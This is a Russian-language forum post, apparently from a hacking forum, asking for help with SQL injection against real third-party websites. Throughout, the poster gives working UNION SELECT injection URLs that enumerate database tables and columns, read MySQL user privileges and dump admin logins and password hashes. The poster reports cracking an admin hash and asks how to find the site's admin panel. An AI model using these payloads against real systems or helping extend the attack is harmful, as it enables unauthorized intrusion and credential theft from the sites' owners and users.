Всем добрый день. Все вопросы по Sql inj
Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог.
На пример :
Сообщение от
None
http://cib.net.ua/catalog.php?catalog_mode=np&list_mode=details&cat= 12&ucat=124&code=1900+and+1=0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name+from +information_schema.tables+limit+0,100+--+
Всё перебрал а такой таблицы найти не смог.
Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции.
Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала.
Вот так перебрал до 50, результат - ничего не найдено
Сообщение от
None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_name,4,5,database(),7,8,9+from+inf ormation_schema.tables+limit+50,100+--+
Но, тут возникает вопрос, ведь
tracy как то узнал
Сообщение от
None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+
вопрос как? растолкуйте пожалуйста этот момент.
==================================
Последний вопрос, возможно самый тупой.
У меня всё получилось, я узнал логин и пароль админа
Сообщение от
None
http://www.stepka.com.ua/?mod=viewProduct&id='3'+and+1=0+union+select+1,2,3 ,4,5,concat_ws(0x03a,login,passwrd),7,8,9+FROM+use rs
расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете?
===================================
Ещё вспомнил
Вот так, если поля логин и пассворд
Сообщение от
None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,column_name,4,5,database(),7,8,9+from+in formation_schema.columns+where+table_name='USER'+l imit+11,100+--+
Но после такого запроса
Сообщение от
None
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,login,4,5,password,7,8,9+from+USER+limit +0,100+--+
получаю
Сообщение от
None
Table 'krost.USER' doesn't exist
Что я делаю не так?